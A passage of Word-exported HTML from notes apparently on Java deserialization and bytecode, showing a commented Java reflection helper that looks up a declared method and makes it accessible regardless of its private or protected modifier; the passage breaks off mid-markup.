style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  

                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/**</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">直接调用对象方法,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">而忽略修饰符(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">private</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> protected</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;"><span style="mso-spacerun:yes;">     </span>* @</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param methodName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param parameterTypes</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">param parameters</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">throws InvocationTargetException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">@</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">throws IllegalArgumentException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">     </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*/</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">static</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">invokeMethod</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> methodName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> parameterTypes</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                                      </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> parameters</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">throws</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">InvocationTargetException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  

                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Method</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> method </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredMethod</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> methodName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> parameterTypes</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  

                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">if</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">method </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">==</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">            </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">throw</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">IllegalArgumentException</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"Could not find method ["</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">+</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> methodName </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">+</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"] on target ["</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">+</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> object </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">+</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"]"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">                  

                  </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span>method</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">setAccessible</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: 